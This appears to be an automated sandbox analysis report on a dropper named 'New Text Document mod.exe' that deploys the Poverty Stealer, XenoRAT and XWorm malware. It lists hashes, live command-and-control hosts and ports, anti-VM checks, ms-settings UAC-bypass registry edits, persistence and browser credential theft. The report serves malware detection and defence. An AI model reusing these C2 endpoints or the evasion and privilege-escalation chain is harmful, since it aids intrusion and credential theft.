povertystealer | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

max time kernel
106s
max time network
110s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
26-11-2024 22:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document mod.exe
Size

8KB
MD5

69994ff2f00eeca9335ccd502198e05b
SHA1

b13a15a5bea65b711b835ce8eccd2a699a99cead
SHA256

2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
SHA512

ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
SSDEEP

96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Score

10^/10

povertystealer xenorat xworm discovery evasion execution persistence privilege_escalation rat spyware stealer trojan

Malware Config

Extracted

Family

xenorat

beastsband.com

Mutex

x3n0

Attributes

delay
5000
install_path
nothingset
port
4444
startup_name
nothingset

Extracted

Family

xworm

Version

5.0

68.178.207.33:7000

Mutex

sSM7p4MT4JctLnRS

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Poverty Stealer Payload 7 IoCs

resource	yara_rule
behavioral5/memory/1956-92-0x0000000000400000-0x000000000040A000-memory.dmp	family_povertystealer
behavioral5/memory/1956-90-0x0000000000400000-0x000000000040A000-memory.dmp	family_povertystealer
behavioral5/memory/1956-89-0x0000000000400000-0x000000000040A000-memory.dmp	family_povertystealer
behavioral5/memory/1956-87-0x0000000000400000-0x000000000040A000-memory.dmp	family_povertystealer
behavioral5/memory/1956-84-0x0000000000400000-0x000000000040A000-memory.dmp	family_povertystealer
behavioral5/memory/1956-82-0x0000000000400000-0x000000000040A000-memory.dmp	family_povertystealer
behavioral5/memory/1956-104-0x0000000000400000-0x000000000040A000-memory.dmp	family_povertystealer

Detect XenoRat Payload 2 IoCs

resource	yara_rule
behavioral5/memory/3060-115-0x0000000008A80000-0x0000000008B7A000-memory.dmp	family_xenorat
behavioral5/memory/3060-184-0x00000000027A0000-0x00000000027AC000-memory.dmp	family_xenorat

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral5/files/0x00130000000054ab-238.dat	family_xworm
behavioral5/memory/964-244-0x0000000000190000-0x000000000019E000-memory.dmp	family_xworm

Poverty Stealer
Poverty Stealer is a crypto and infostealer written in C++.
stealer povertystealer
Povertystealer family
povertystealer
XenorRat
XenorRat is a remote access trojan written in C#.
trojan rat xenorat
Xenorat family
xenorat
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	UqhRb9F.exe

Boot or Logon Autostart Execution: Active Setup 2 TTPs 12 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\IsInstalled = "1"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}	ie4uinit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Version = "11,0,9600,0"	ie4uinit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\IsInstalled = "1"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}	ie4uinit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Locale = "*"	ie4uinit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Version = "11,0,9600,0"	ie4uinit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\IsInstalled = "1"	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}	ie4uinit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Locale = "*"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}	ie4uinit.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
904	powershell.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	UqhRb9F.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	UqhRb9F.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 7 IoCs

pid	Process
3060	UqhRb9F.exe
1620	Tq4a1Bz.exe
1956	Tq4a1Bz.exe
2008	wKQeiIr.exe
3044	fHR9z2C.exe
1436	filer.exe
1612	AmLzNi.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine	UqhRb9F.exe

Loads dropped DLL 5 IoCs

pid	Process
1620	Tq4a1Bz.exe
2280	New Text Document mod.exe
2280	New Text Document mod.exe
2280	New Text Document mod.exe
2280	New Text Document mod.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
17	raw.githubusercontent.com
19	raw.githubusercontent.com

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral5/files/0x0005000000019274-200.dat	autoit_exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
3060	UqhRb9F.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1620 set thread context of 1956	1620	Tq4a1Bz.exe	35

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	UqhRb9F.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Tq4a1Bz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Tq4a1Bz.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\Hidden = "0"	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main	ie4uinit.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mp4v	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wmx	unregmp2.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	ie4uinit.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.3gpp	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mp2v	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.rmi	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wma	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mp3	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mpg	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wvx	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.asx	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.midi	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mpg	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.3gpp	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.aac	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.m3u	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mp2	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mp2v	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wma	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wmd	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.aiff	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wmv	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.3g2	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.3gp	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mov	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.adts	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.au	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.avi	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mpe	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wpl	unregmp2.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\Hidden = "0"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.3gp2	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mid	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mpa	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.adt	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mod	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mpv2	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wm	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Capabilities	ie4uinit.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mod	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wax	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wvx	unregmp2.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	ie4uinit.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.m4v	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mpv2	unregmp2.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main	ie4uinit.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.m1v	unregmp2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "4"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.asx	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.3g2	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.adts	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mov	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mp4	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wav	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wmd	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wmx	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wmv	unregmp2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListTTL = "0"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.3gp	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.m3u	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mp4v	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.m2v	unregmp2.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\svgfile\shell\printto\command\ = "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\system32\\mshtml.dll\",PrintHTML \"%1\" \"%2\" \"%3\" \"%4\""	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Video\shell\Enqueue\ = "&Add to Windows Media Player list"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.3gpp\MP2.Last = "Custom"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\NetworkExplorerPlugins\urn:schemas-upnp-org:device:MediaRenderer:1\ShellEx\ContextMenuHandlers\{A45AEC2B-549E-405F-AF3E-C6B03C4FDFBF}	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.html\ = "htmlfile"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\svgfile\shell	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/x-mpeg\CLSID = "{cd3afa76-b84f-48f0-9393-7edc34128127}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.xht\Content Type = "application/xhtml+xml"	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\open\command\DelegateExecute = "{17FE9752-0B5A-4665-84CD-569794602F5C}"	ie4uinit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\.wm\OpenWithProgIds\WMP11.AssocFile.ASF = "0"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.aifc\MPlayer2.BAK = "VLC.aifc"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/mpg\Extension = ".mp3"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\https\ = "URL:HyperText Transfer Protocol with Privacy"	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.m4v\MP2.Last = "Custom"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/wav	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shellex\ContextMenuHandlers\PlayTo	unregmp2.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\.au\OpenWithProgIds\WMP11.AssocFile.AU = "0"	unregmp2.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\ftp\EditFlags = "2"	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mp4\MPlayer2.BAK = "VLC.mp4"	unregmp2.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mpa\OpenWithProgIds\WMP11.AssocFile.MPEG = "0"	unregmp2.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\ms-settings\Shell	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Video\shell\Play\command	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.m2v	unregmp2.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MIDI\PreferExecuteOnMismatch = "1"	unregmp2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\ms-settings\Shell\Open\command\DelegateExecute	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Enqueue\command\DelegateExecute = "{45597c98-80f6-4549-84ff-752cf55e2d29}"	unregmp2.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\WMP11.AssocFile.AU\PreferExecuteOnMismatch = "1"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\http\shell\open\command\DelegateExecute = "{17FE9752-0B5A-4665-84CD-569794602F5C}"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/3gpp2	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\system32\\mshtml.dll\",PrintHTML \"%1\""	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.au\ = "WMP11.AssocFile.AU"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.3gp2\OpenWithProgIds	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\video/x-ms-wmv\CLSID = "{cd3afa94-b84f-48f0-9393-7edc34128127}"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\video\shell\Play\ = "&Play with Windows Media Player"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\ = "htmlfile"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.html	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\video\shell\Enqueue	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Enqueue\NeverDefault	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\opennew\MUIVerb = "@C:\\Windows\\system32\\ieframe.dll,-5731"	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/mp4\Extension = ".m4a"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\printto\command	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/x-midi	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\rlogin	ie4uinit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mpv2\OpenWithProgIds\WMP11.AssocFile.MPEG = "0"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/mp3	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\open\MUIVerb = "@C:\\Windows\\system32\\ieframe.dll,-5732"	ie4uinit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\.wax\OpenWithProgIds\WMP11.AssocFile.WAX = "0"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\system32\\mshtml.dll\",PrintHTML \"%1\""	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\video\shell\Enqueue\command\DelegateExecute = "{45597c98-80f6-4549-84ff-752cf55e2d29}"	unregmp2.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\.asx\OpenWithProgIds\WMP11.AssocFile.ASX = "0"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\https\shell	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.xhtml	ie4uinit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mp4v\OpenWithProgIds\WMP11.AssocFile.MP4 = "0"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mpe\MP2.Last = "Custom"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/3gpp2\CLSID = "{cd3afa98-b84f-48f0-9393-7edc34128127}"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Microsoft.Website\shellex\IconHandler	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\opennew\command\DelegateExecute = "{17FE9752-0B5A-4665-84CD-569794602F5C}"	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/mid\Extension = ".mid"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9801"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play\NeverDefault	unregmp2.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\WMP11.AssocFile.AIFF\PreferExecuteOnMismatch = "1"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\opennew\MUIVerb = "@C:\\Windows\\system32\\ieframe.dll,-5731"	ie4uinit.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe
3060	UqhRb9F.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2280	New Text Document mod.exe
Token: SeDebugPrivilege	3060	UqhRb9F.exe
Token: SeDebugPrivilege	904	powershell.exe

Suspicious use of FindShellTrayWindow 9 IoCs

pid	Process
1612	AmLzNi.exe
1612	AmLzNi.exe
1612	AmLzNi.exe
1612	AmLzNi.exe
1660	ComputerDefaults.exe
920	ComputerDefaults.exe
1020	ComputerDefaults.exe
1020	ComputerDefaults.exe
920	ComputerDefaults.exe

Suspicious use of SendNotifyMessage 4 IoCs

pid	Process
1612	AmLzNi.exe
1612	AmLzNi.exe
1612	AmLzNi.exe
1612	AmLzNi.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3060	UqhRb9F.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2280 wrote to memory of 3060	2280	New Text Document mod.exe	32
PID 2280 wrote to memory of 3060	2280	New Text Document mod.exe	32
PID 2280 wrote to memory of 3060	2280	New Text Document mod.exe	32
PID 2280 wrote to memory of 3060	2280	New Text Document mod.exe	32
PID 2280 wrote to memory of 1620	2280	New Text Document mod.exe	33
PID 2280 wrote to memory of 1620	2280	New Text Document mod.exe	33
PID 2280 wrote to memory of 1620	2280	New Text Document mod.exe	33
